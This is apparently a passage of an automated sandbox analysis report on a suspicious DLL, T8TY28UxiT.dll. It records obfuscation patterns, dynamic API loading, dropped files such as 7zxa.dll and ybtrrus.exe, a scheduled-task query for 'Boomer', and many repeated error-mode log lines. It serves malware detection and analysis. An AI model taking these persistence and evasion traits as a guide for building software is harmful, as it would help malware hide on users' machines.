Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: T8TY28UxiT.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: g2m.pdb source: rundll32.exe, 0000000C.00000002.1908516008.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll
Source:	Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: rundll32.exe, 0000000C.00000003.1880320269.000000000316E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934185341.0000000004D87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000002.2706441073.000000006FE65000.00000002.00000001.01000000.00000008.sdmp, ybtrrus.exe, 00000021.00000002.2704695699.000000006EA25000.00000002.00000001.01000000.0000000C.sdmp

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C6927E0 DllMain,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

12_2_6C6927E0

PE file contains sections with non-standard names

Source: 7zxa.dll.12.dr	Static PE information: section name: .didata
Source: 7zxa.dll.19.dr	Static PE information: section name: .didata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00592EC8 push ebx; iretd	1_2_00592EC9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00592ECB push 516C8D2Ch; iretd	1_2_00592ED9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00592EF8 push ebp; iretd	1_2_00592EF9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00592EE8 push edi; iretd	1_2_00592EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_034CC1C8 push eax; iretd	4_2_034CC1C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6EEDFE pushfd ; retf	12_2_6C6EEE01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6EEF74 push esi; retf	12_2_6C6EEF77
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_009FC308 push esp; ret	15_2_009FC30D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_02DAC458 push eax; retf	18_2_02DAC4AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_02DAC567 pushad ; retf	18_2_02DAC56D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_0089C917 push eax; retf	20_2_0089C921
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE5DE65 push ecx; ret	28_2_6FE5DE78
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05457764 push ecx; mov dword ptr [esp], eax	28_2_05457765
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545D148 push ecx; mov dword ptr [esp], edx	28_2_0545D149
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_054608F8 push ecx; mov dword ptr [esp], eax	28_2_054608FD
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461FC8 push ecx; mov dword ptr [esp], edx	28_2_05461FC9
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461FB0 push ecx; mov dword ptr [esp], edx	28_2_05461FB1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461E76 push ecx; mov dword ptr [esp], edx	28_2_05461E79
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461E18 push ecx; mov dword ptr [esp], edx	28_2_05461E19
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461E24 push ecx; mov dword ptr [esp], edx	28_2_05461E25
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461E30 push ecx; mov dword ptr [esp], edx	28_2_05461E31
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461E9C push ecx; mov dword ptr [esp], edx	28_2_05461E9D
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461EBE push ecx; mov dword ptr [esp], edx	28_2_05461EC1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05461BDC push ecx; mov dword ptr [esp], edx	28_2_05461BDD
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05464D34 push ecx; mov dword ptr [esp], edx	28_2_05464D36
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05464FDC push ecx; mov dword ptr [esp], ecx	28_2_05464FE1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_054647E6 push ecx; mov dword ptr [esp], eax	28_2_054647E9
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0546508A push ecx; mov dword ptr [esp], ecx	28_2_05465091
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05465396 push ecx; mov dword ptr [esp], edx	28_2_05465399
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05464B9C push ecx; mov dword ptr [esp], edx	28_2_05464B9D
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05479884 push ecx; mov dword ptr [esp], ecx	28_2_05479888

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns

Drops PE files

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\iDQiPwFWUp\7zxa.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\pnVcakKiqh\7zxa.dll			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\iDQiPwFWUp\ybtrrus.exe

Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468BF6 IsIconic,

28_2_05468BF6

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
